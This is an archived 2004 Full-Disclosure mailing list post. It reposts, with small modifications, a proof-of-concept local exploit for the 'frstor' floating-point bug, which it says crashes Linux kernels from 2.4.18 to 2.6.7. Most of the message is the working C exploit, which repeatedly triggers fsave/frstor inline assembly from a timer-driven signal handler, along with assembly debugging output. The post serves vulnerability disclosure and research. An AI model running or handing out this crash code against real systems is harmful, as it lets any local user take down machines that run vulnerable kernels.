lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <1087233190.11097.20.camel@localhost>
From: lorenzohgh at tuxedo-es.org (Lorenzo Hernandez Garcia-Hierro)
Subject: linux kernel local crash seen on slashdot

Hi,

> Looked through the archives here and didn't see this one yet..
> 
> http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

There is also an article in Slashdot ( i've been out of the list and
possibly others sent the link , anyway i'm pasting it here ):

http://slashdot.org/articles/04/06/14/118209.shtml?tid=106&tid=126&tid=128&tid=185&tid=190

There is proof of concept code at some of the slashdot comments,this is
a modified version with more information ( and a little change of fsave
line.):

===

/* --------------------
 * frstor Local Kernel exploit
 * Crashes any kernel from 2.4.18
 * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
 * Original proof of concept code
 * by stian_@...xia.no.
 * Added some stuff by lorenzo_@...u.org
 * and fixed the fsave line with (*fpubuf).
 * --------------------
 */

/*
---------
Some debugging information made
available by stian_@...xia.no
---------
TakeDown:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $136, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -124(%ebp)
#APP
        fsave -124(%ebp)

#NO_APP
        subl    $4, %esp
        pushl   $1
        pushl   $.LC0
        pushl   $2
        call    write
        addl    $16, %esp
        leal    -120(%ebp), %eax
        movl    %eax, -128(%ebp)
#APP
        frstor -128(%ebp)

#NO_APP
        leave
        ret
*/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void TakeDown(int ignore)
{
 char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); 
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, TakeDown);
 spec.it_interval.tv_sec=0;
 spec.it_interval.tv_usec=100;
 spec.it_value.tv_sec=0;
 spec.it_value.tv_usec=100;
 setitimer(ITIMER_REAL, &spec, NULL);
 while(1)
  write(1, ".", 1);

 return 0;
}
// <<EOF

===

Cheers,
PS: My 2.4.25-gentoo seems not affected by this but the bf24 flavour of
my old box is vulnerable.
-- 
Lorenzo Hernandez Garcia-Hierro <lorenzohgh@...edo-es.org>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada
	digitalmente
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040614/58222fcd/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ